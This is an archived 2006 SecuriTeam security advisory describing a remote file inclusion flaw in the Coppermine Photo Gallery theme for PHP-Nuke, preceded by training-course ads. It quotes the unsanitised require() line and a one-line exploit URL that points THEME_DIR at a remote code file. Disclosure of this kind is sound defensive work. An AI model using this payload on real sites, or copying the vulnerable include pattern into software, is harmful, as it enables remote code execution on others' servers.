Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Coppermine Photo Gallery File Inclusion

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Coppermine Photo Gallery File Inclusion
Date: 31 Jul 2006 18:07:32 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Coppermine Photo Gallery File Inclusion
------------------------------------------------------------------------


SUMMARY

 <http://coppermine-gallery.net/index.php> Coppermine is "a multi-purpose, 
multi-platform, multi-language, fully-featured, and integrated PHP Web 
photo gallery script that uses GD lib or ImageMagick with a MySQL backend. 
It features numerous translations, themes, integration with PHP-Nuke, 
PostNuke, pMachine, phpBB, InvisionBoard, vBulletin, and YaBBSE, support 
for Microsoft's XP Publish, e-cards, and search functions". The Coppermine 
Photo Gallery theme that comes bundled with PHP-Nuke allows remote 
attackers to cause the product to include arbitrary files, which in turn 
it executes, allowing remote attackers to run arbitrary code on the 
machine.

DETAILS

Vulnerable Systems:
 * Coppermine Photo Gallery version 1.2.2b-Nuke

Vulnerable code in theme.php:
require($THEME_DIR."/user_list_info_box.inc");

As can be seen the $THEME_DIR parameter allows remote attackers to cause a 
file inclusion vulnerability.

Exploit:
www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://evalcode.txt


ADDITIONAL INFORMATION

The information has been provided by A-S-T TEAM.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Coppermine Photo Gallery File Inclusion, SecuriTeam <=
Previous by Date:  [NEWS] Apache "mod_rewrite" LDAP URI Handling Remote Off-By-One Buffer Overflow, SecuriTeam
Previous by Thread:  [NEWS] Apache "mod_rewrite" LDAP URI Handling Remote Off-By-One Buffer Overflow, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]